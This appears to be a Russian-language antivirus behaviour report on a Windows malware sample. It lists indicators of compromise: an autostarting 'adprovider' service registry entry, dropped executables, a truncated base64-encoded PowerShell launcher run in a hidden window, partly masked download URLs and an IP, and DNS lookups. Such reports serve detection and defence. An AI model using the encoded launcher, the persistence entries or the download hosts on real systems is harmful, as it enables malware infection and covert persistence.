Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\adprovider] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\adprovider] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDFO\adprovider.exe"'
- 'adprovider' "%WINDIR%\SysWOW64\KBDFO\adprovider.exe"
- 'adprovider' %WINDIR%\SysWOW64\KBDFO\adprovider.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGgAZAA2AGQAdwBxAD0AKAAnAFQAdgBvACcAKwAnAHQAdAAnACsAJwBnAGgAJwApADsAJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQARQBuAFYAOgB0AEUAbQBwAFwATwBGAGYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\q9b2d8pa2.exe
- %WINDIR%\syswow64\kbdfo\adprovider.exe
- %TEMP%\office2019\q9b2d8pa2.exe в %WINDIR%\syswow64\kbdfo\adprovider.exe
- '17#.#4.215.84':80
- http://kr#####urtransfer.com/WLdPbPn/
- http://kr####gaireland.com/cgi-bin/X5h427139317/
- http://la###ni.com.br/pCG/
- http://17#.#4.215.84/hGXGrv3Nbbnrs/joFQaiuVwgpYKIqWcp/K5j3R4t/uXQt9HIwfQaKc1j8c5/
- DNS ASK ha####tanbul.com
- DNS ASK hc###t.com.br
- DNS ASK kr#####urtransfer.com
- DNS ASK kr####gaireland.com
- DNS ASK la###ni.com.br
- '%TEMP%\office2019\q9b2d8pa2.exe'
- '%WINDIR%\syswow64\kbdfo\adprovider.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGgAZAA2AGQAdwBxAD0AKAAnAFQAdgBvACcAKwAnAHQAdAAnACsAJwBnAGgAJwApADsAJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQARQBuAFYAOgB0AEUAbQBwAFwATwBGAGYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)